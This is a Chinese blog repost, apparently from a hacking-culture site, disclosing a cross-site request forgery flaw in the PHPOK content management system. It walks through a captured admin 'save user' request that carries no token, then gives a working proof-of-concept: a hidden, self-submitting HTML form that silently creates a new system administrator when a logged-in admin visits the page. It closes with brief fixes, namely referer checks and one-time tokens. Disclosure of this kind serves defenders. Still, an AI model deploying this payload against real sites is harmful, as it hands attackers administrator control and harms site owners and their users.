记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

PHPOK CSRF获取管理员权限及修复

2014-05-04 01:45
测试环境(PHPOK):
 
 
添加用户:
 
抓包抓到如下内容:
 
POST /phpok/admin.php?c=admin&f=save HTTP/1.1
 
Host: www.evil.com
 
Proxy-Connection: keep-alive
 
Content-Length: 67
 
Cache-Control: max-age=0
 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 
Origin: http://www.evil.com
 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36 SE 2.X MetaSr 1.0
 
Content-Type: application/x-www-form-urlencoded
 
Referer: http://www.evil.com/phpok/admin.php?c=admin&f=set
 
Accept-Encoding: gzip,deflate,sdch
 
Accept-Language: zh-CN,zh;q=0.8
 
Cookie: PHPSESSION=c003810ffea32e03358eb66d6a1a81cb
 
 
 
id=&account=poc&pass=poc123&email=poc%40qq.com&status=1&if_system=1
 
 
 
 
发现没有加token,查看源码也没有看到判断referer。 所以可能存在CSRF,于是构造如下POC:
 
<div style="display:none">
 
<form action="http://www.evil.com/phpok/admin.php?c=admin&f=save" id="poc" name="poc" method="post">
 
<input type="hidden" name="id" value=""/>
 
<input type="hidden" name="account" value=""/>
 
<input type="hidden" name="pass" value=""/>
 
<input type="hidden" name="email" value=""/>
 
<input type="hidden" name="status" value=""/>
 
<input type="hidden" name="if_system" value=""/>
 
<input type="submit" name="up" value"submit"/>
 
</form>
 
<script>
 
var t = document.poc;
 
t.account.value="evil";
 
t.pass.value="evil";
 
t.email.value="evil@qq.com";
 
t.status.value="1";
 
t.if_system.value="1";
 
document.poc.submit();
 
</script>
 
</div>
 
 
 
 
打开POC页面前:
 
打开后:
 
为此添加管理员成功。。。
 
 
 
理论上是通杀所有版本的。。。
修复方案:
1. 判断referer来源,根据业务的逻辑进行referer的过滤。
 
2. 添加一次性token,同时注意随机不可预测性!
知识来源: www.2cto.com/Article/201405/297663.html

阅读:79924 | 评论:0 | 标签:CSRF

想收藏或者和大家分享这篇好文章→复制链接地址

“PHPOK CSRF获取管理员权限及修复”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词